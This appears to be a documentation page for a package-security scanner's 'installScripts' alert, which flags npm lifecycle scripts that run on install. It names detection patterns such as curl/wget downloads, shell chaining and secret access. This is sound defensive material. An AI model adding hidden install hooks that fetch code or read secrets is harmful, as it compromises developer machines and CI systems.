installScripts

Rendered from docs/alerts/installScripts.md

Back to index

installScripts

Flags npm lifecycle scripts that execute automatically during install/uninstall (for example: preinstall, install, postinstall).

Implemented in: src/lib/detection/plugins/install-scripts.ts
Enabled by default: yes

What it means

The package declares one or more lifecycle scripts that will run when a user installs (or uninstalls) the package.

Why it matters

Install scripts can execute arbitrary code on developer machines and CI, and are a common initial execution vector for supply-chain malware.

What to do

  • Review the script commands in package.json and ensure they’re expected.
  • Look for downloads (curl/wget), shell chaining, or secret access.
  • During investigation, consider installing with --ignore-scripts to prevent execution.

Common fields

  • filePath: package.json
  • codeSnippet: the offending "postinstall": "..." (or similar) line
  • metadata.scriptName, metadata.scriptCommand, metadata.suspiciousPatterns